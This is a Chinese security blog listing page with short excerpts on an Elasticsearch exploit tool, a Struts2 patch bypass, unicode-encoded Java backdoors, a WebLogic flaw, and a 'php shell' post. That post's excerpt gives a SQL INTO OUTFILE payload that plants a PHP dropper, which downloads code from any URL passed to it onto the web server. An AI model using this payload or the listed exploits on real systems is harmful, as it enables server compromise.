Security(80 篇文章)

[更新]Elasticsearch 代码执行漏洞利用工具

yzmm
1419 阅读

更新地址:Elasticsearch_1.2.jar 命令参数忘记编码了,导致不能执行多参数已修复了。修改了超时为10秒、异常情况直接输出页面源码。 1、ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。 2、Lucene是apache软件基金会4 jakarta项目组的一个子项目,是一个...

阅读全文

php shell

yzmm
562 阅读

sql: select '<?php file_put_contents(dirname(__FILE__)."/".$_GET[\'file\'], file_get_contents($_GET[\'url\']));?>' into outfile'/var/www/html/xxx/dat...

阅读全文

Struts2再曝高危漏洞(S2-020补丁绕过)

yzmm
607 阅读

之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用! 暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat: http://127.0.0.1/s/example/HelloWorld.action?class.classLoad...

阅读全文

Java 后门-unicode编码

yzmm
726 阅读

Java代码默认可以直接全是unicode编码: 假设有如下未编码Java代码: public class Test { public static void main(String[] args) { System.out.println(1); } } 编码后的Java代码: \u0070\u0075\u0062\u006c\u0069\u0063 \u0063\u006c\u0061\u00...

阅读全文

WebLogic CVE-2014-2470

yzmm
963 阅读

Oracle WebLogic很容易出现一个远程安全漏洞。攻击者无需身份验证即可控制WebLogic服务器。漏洞利用T3协议使WLS Security子组建受影响。 版本:10.0.2.0, 10.3.6.0, 12.1.1.0, 12.1.2.0 WebLogic Server 中的 RMI 通信 WebLogic Server 中的 RMI 通信使用 T3 协议在 WebLogic Serve...

阅读全文